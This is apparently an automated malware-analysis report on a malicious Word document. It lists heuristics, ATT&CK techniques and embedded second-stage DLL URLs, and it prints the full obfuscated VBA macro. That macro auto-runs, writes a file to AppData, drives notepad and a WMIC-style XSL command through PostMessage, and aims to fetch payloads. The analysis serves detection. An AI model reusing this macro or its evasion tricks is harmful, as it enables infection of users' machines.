MALICIOUS
238
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Word document containing a VBA macro that executes upon opening. The macro utilizes CreateObject to instantiate 'scripting.filesystemobject' and 'wscript.shell', and then calls the 'Shell()' function. This indicates the macro's intent is to download and execute a second-stage payload from the URLs: https://bentorium.com/vapirum409.dll and https://bentorium.com/coclew.dll.
Heuristics 9
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
"." & _ "shell" how_now_laertes -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set up_another_room = CreateObject(distress_or) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() Dim to_beard_me As String -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
ham_thou_hast = Environ(close_within) -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://bentorium.com/vapirum409.dll In document text (OLE body)
- https://bentorium.com/coclew.dllIn document text (OLE body)
- http://www.w3.org/1999/XSL/TransformIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9883 bytes |
SHA-256: 0dbc5efa7590f70ab79ad200fc4bc0909f9deeec89b3419ff73202adff299a5a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public distress_or As String
Sub autoopen()
Dim to_beard_me As String
to_beard_me = "00" & _
":" & _
Chr(Log(7.97664430768725E+22) / Log(3)) & _
Chr(Sqr(2304)) & _
":" & _
Chr(Sqr(2304)) & _
"2"
ActiveDocument.InlineShapes(1).Delete
ActiveDocument.InlineShapes(1).ScaleHeight = 66
ActiveDocument.InlineShapes(1).ScaleWidth = 80
but_truly_in = Now() + TimeValue(to_beard_me)
While Now() < but_truly_in
Debug.Print Now()
Wend
Dim up_another_room As Object
Dim distress_or As String
distress_or = "scripting.filesystemob" & _
"ject"
and_ophelia
Set up_another_room = CreateObject(distress_or)
Call made_you_breathe(up_another_room)
'o god hath kill
bawds_the_murther
his_list_if
d_since_so
End Sub
Attribute VB_Name = "but_a_radiant"
Public question_you_could As Long
Public Const have_i_th As Long = &H102
Public and_we_find As Long
Public old_grandsire As Object
Public o_give_thee As String
Public lick_absurd_pomp As Variant
Public anything_so As String
Public ham_thou_hast As String
Sub made_you_breathe(great_power_t)
Dim of_it_springs As String
of_it_springs = "l" & _
"et_s_speec" & _
"h"
Dim of_liquor_exit As String
of_liquor_exit = "the" & _
Chr(95) & _
Chr(98) & _
Chr(Sqr(13689)) & _
Chr(Sqr(12996)) & _
"n" & _
Chr(Log(1.64550455732121E+63) / Log(4)) & _
"n" & _
"g" & _
"_zon" & _
Chr(Log(2.53530120045646E+30) / Log(2))
Dim upon_your_coronation As String
upon_your_coronation = "i_" & _
Chr(Log(5.15377520732011E+47) / Log(3)) & _
Chr(Log(9.12975816651136E+52) / Log(3)) & _
Chr(95) & _
Chr(Sqr(9604)) & _
"eseech"
lick_absurd_pomp = Array(of_it_springs, of_liquor_exit, upon_your_coronation)
For and_we_find = 1 To 325
o_give_thee = lick_absurd_pomp(Int((UBound(lick_absurd_pomp) - LBound(lick_absurd_pomp) + 1) * Rnd + LBound(lick_absurd_pomp)))
Next and_we_find
ham_thou_hast = Environ(close_within)
anything_so = ham_thou_hast & under_the_summit & o_give_thee & chanson_will
Set old_grandsire = great_power_t.CreateTextFile(anything_so, True, True)
old_grandsire.Close
End Sub
Attribute VB_Name = "now_our_scale"
Public and_queen_pol As String
Public ears_ham_why As String
Public Const thus_hath As Long = &H112
Public Const with_imagination_mar As Long = &H10
Public Const within_mother_father As Long = &H3
Sub death_the_court()
treasure_open = Now() + TimeValue(god_s_the)
While Now() < treasure_open
Wend
of_all_without = maker_the_mobled(0, 0, tis_seen_of, vbNullString)
shepherds_give_these = maker_the_mobled(of_all_without, 0, day_horatio, vbNullString)
For Each times_our_practices In ActiveDocument.Paragraphs
ears_ham_why = times_our_practices.Range.Text
If Len(ears_ham_why) > 3 Then
For pooh_you_shall = 1 To Len(ears_ham_why)
For summit_of_uncurrent = 1 To 684
of_i_will = Asc(Mid(ears_ham_why, pooh_you_shall, 1))
Next summit_of_uncurrent
this_relief shepherds_give_these, have_i_th, of_i_will, 0
Next pooh_you_shall
End If
Next times_our_practices
argal_he_likewise = Now() + TimeValue(god_s_the)
While Now() < argal_he_likewise
Wend
this_relief of_all_without, more_dear_mother, within_mother_father, of_twelve_i
'such a day and to
so_gracious_figure = Now() + TimeValue(god_s_the)
While Now() < so_gracious_figure
Wend
this_relief of_all_without, with_imagination_mar, 0, 0
End Sub
Attribute VB_Name = "immediately_pours"
Public therefore_tis As String
Public an_exact_command As Long
Public and_did_you As String
Public times_our_practices As Paragraph
Public Declare PtrSafe Function maker_the_mobled Lib "user32.dll" Alias "FindWindowExA" (ByVal and_not_thy As Long, ByVal diseases_desperate_appliance As Long, ByVal d_his_wonder As String, ByVal they_bore_arms As String) As Long
Public Declare PtrSafe Function this_relief Lib "user32.dll" Alias "PostMessageA" (ByVal strange_that_sense As Long, ByVal there_s_slave As Long, ByVal sworn_t_he As Long, ByVal and_wretched_rash As Long) As Long
Public Const of_twelve_i As Long = &H46
Public Const more_dear_mother As Long = &H111
Sub comes_here_between()
as_england_ham = Now() + TimeValue(god_s_the)
While Now() < as_england_ham
Wend
sailor_god = and_means_may & Chr(34) & anything_so & Chr(34)
On Error Resume Next: Wscript.Quit = ("" & CreateObject(((more_merit_is))).Run((sailor_god), (0), (0)))
a_kind_of = Now() + TimeValue(god_s_the)
While Now() < a_kind_of
Wend
End Sub
Attribute VB_Name = "contrive_against_your"
Public and_means_may As String
Sub and_ophelia()
and_means_may = "notepad "
poison_of
End Sub
Attribute VB_Name = "in_together"
Public chanson_will As String
Sub poison_of()
chanson_will = ".tx" & _
Chr(116)
prithee_take_thy
End Sub
Attribute VB_Name = "tis_very_much"
Public and_keep_the As String
Sub prithee_take_thy()
and_keep_the = Chr(Sqr(9801)) & _
Chr(Sqr(12321)) & _
Chr(Sqr(12100)) & _
"s" & _
"o" & _
Chr(Log(3.38139191352273E+51) / Log(3)) & _
Chr(Log(6.42775217703596E+60) / Log(4)) & _
"w" & _
Chr(Log(4.05648192073033E+31) / Log(2)) & _
"ndowclass"
with_an_t
End Sub
Attribute VB_Name = "joy_their_course"
Public close_within As String
Sub with_an_t()
close_within = "appdata"
revolution_and
End Sub
Attribute VB_Name = "where_sadly"
Public away_with_blood As String
Sub revolution_and()
away_with_blood = Chr(Sqr(14161)) & _
Chr(109) & _
Chr(Log(4.05648192073033E+31) / Log(2)) & _
Chr(Log(4.01734511064748E+59) / Log(4))
circumstance_get
End Sub
Attribute VB_Name = "the_breathing"
Public tis_seen_of As String
Sub circumstance_get()
tis_seen_of = "n" & _
Chr(Log(6.73998666678766E+66) / Log(4)) & _
Chr(Log(6.90174634679056E+69) / Log(4)) & _
Chr(Log(2.53530120045646E+30) / Log(2)) & _
Chr(112) & _
Chr(97) & _
"d"
gives_the
End Sub
Attribute VB_Name = "shrewdly_it_is"
Public day_horatio As String
Sub gives_the()
day_horatio = Chr(Log(2.53530120045646E+30) / Log(2)) & _
"d" & _
Chr(105) & _
"t"
yet_the_dust
End Sub
Attribute VB_Name = "o_good_cornelius"
Public under_the_summit As String
Sub yet_the_dust()
under_the_summit = Chr(Sqr(8464))
shot_within
End Sub
Attribute VB_Name = "and_kettledrums"
Public god_s_the As String
Sub shot_within()
god_s_the = "00:0" & _
Chr(48) & _
Chr(Log(8.30767497365572E+34) / Log(4)) & _
Chr(48) & _
Chr(Log(1.26765060022823E+30) / Log(4))
and_held_me
End Sub
Attribute VB_Name = "and_as_one"
Public more_merit_is As String
Sub and_held_me()
more_merit_is = "wscr" & _
"ip" & _
Chr(Log(2.21853123446226E+55) / Log(3)) & _
"." & _
"shell"
how_now_laertes
End Sub
Attribute VB_Name = "and_in_thee"
Public themselves_laugh_whose As String
Sub how_now_laertes()
themselves_laugh_whose = "." & _
Chr(120) & _
Chr(Sqr(13225)) & _
"l"
us_thou_art
End Sub
Attribute VB_Name = "and_most_humbly"
Public heavy_headed As String
Sub us_thou_art()
heavy_headed = "process li" & _
Chr(115) & _
Chr(Sqr(13456)) & _
Chr(Log(4294967296#) / Log(2)) & _
Chr(47) & _
"f" & _
Chr(Log(6.73998666678766E+66) / Log(4)) & _
"r" & _
Chr(Sqr(11881)) & _
Chr(Sqr(9409)) & _
Chr(Sqr(13456)) & _
":"
End Sub
Attribute VB_Name = "swear_t_o"
Sub bawds_the_murther()
comes_here_between
End Sub
Attribute VB_Name = "take_heed_and"
Sub his_list_if()
his_conceit_that
End Sub
Attribute VB_Name = "come_my_heart"
Sub his_conceit_that()
a_mineral
End Sub
Attribute VB_Name = "sometime_sister"
Sub a_mineral()
daughter_shown_gives
End Sub
Attribute VB_Name = "opposition_take_my"
Sub daughter_shown_gives()
death_the_court
End Sub
Attribute VB_Name = "but_my_honour"
Sub d_since_so()
enough_what_we
End Sub
Attribute VB_Name = "come_my_lord"
Sub enough_what_we()
our_hope_your
End Sub
Attribute VB_Name = "to_parley"
Sub our_hope_your()
that_grows
End Sub
Attribute VB_Name = "of_frame_outlives"
Sub that_grows()
play_upon_our
End Sub
Attribute VB_Name = "i_shall_first"
Sub play_upon_our()
in_corruption_from
End Sub
Attribute VB_Name = "a_passionate"
Sub in_corruption_from()
commission_will
End Sub
Attribute VB_Name = "command_i"
Sub commission_will()
it_doth_try
End Sub
Attribute VB_Name = "the_toe_of"
Sub it_doth_try()
pol_come_and
End Sub
Attribute VB_Name = "hill_of_the"
Sub pol_come_and()
you_now_he
End Sub
Attribute VB_Name = "confess_he_hath"
Sub you_now_he()
On Error Resume Next: Wscript.Quit = ("" & CreateObject(((more_merit_is))).Run((away_with_blood), (0), (0)))
history_guil_faith = Now() + TimeValue(god_s_the)
While Now() < history_guil_faith
Debug.Print Now()
Wend
and_queen_pol = Replace(anything_so, chanson_will, themselves_laugh_whose)
Name anything_so As and_queen_pol
therefore_tis = heavy_headed & Chr(34) & and_queen_pol & Chr(34)
Debug.Print therefore_tis
For an_exact_command = 1 To Len(therefore_tis)
For question_you_could = 1 To 71362
health_and = Asc(Left$(Mid$(therefore_tis, an_exact_command), 1))
Next question_you_could
king_queen_is = maker_the_mobled(0, 0, and_keep_the, vbNullString)
On Error Resume Next: Wscript.Quit = ("" & this_relief((king_queen_is), (have_i_th), (health_and), (0)))
Next an_exact_command
On Error Resume Next: Wscript.Quit = ("" & this_relief((king_queen_is), (have_i_th), (Asc(vbNewLine)), (0)))
End Sub
Attribute VB_Name = "as_kill_d"
Attribute VB_Name = "ghost_queen_i"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.